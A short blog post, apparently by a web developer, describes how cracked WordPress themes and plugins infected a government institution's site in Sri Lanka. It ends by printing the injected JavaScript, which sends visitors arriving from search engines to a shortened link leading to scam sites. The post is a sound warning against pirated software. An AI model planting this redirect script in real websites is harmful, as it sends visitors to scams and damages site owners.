As a web developer, I have learned firsthand the dangers of using cracked themes and plugins on a WordPress website. Even with security measures in place, it is possible for malware to infect the site. Once infected, it can be difficult to remove. That’s why it’s important to use reputable and secure themes and plugins from the start.

I experienced this when working on the website of a government institution in Sri Lanka. This institution wanted to build their website using a premium theme available on Envato. The client initially asked me to use cracked themes and plugins as a sample, but they ultimately decided to use the same ones on their live website. Within a week, the site was infected with a redirecting script that affected all of the search engine links. After that, the links in every search engine are redirected to fake scam sites.

Despite using multiple virus guard plugins, they were unable to detect and delete the script. Meanwhile, they came to their senses and purchased the original theme from Envato. Eventually, I had to manually search the source code to find the malicious script and use a search and replace plugin to remove it.

After that they replaced the cracked themes and plugins with original ones and were able to maintain the website without any further issues. So in this post I wanted to share my experience to demonstrate the importance of using secure and reputable themes and plugins from the start. I hope this gives you an idea of the potential risks involved with using cracked themes and plugins.

Below I mention the script that was infected.

<script type="text/javascript"> var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='https://tinyurl.com/yzypxycj' } </script>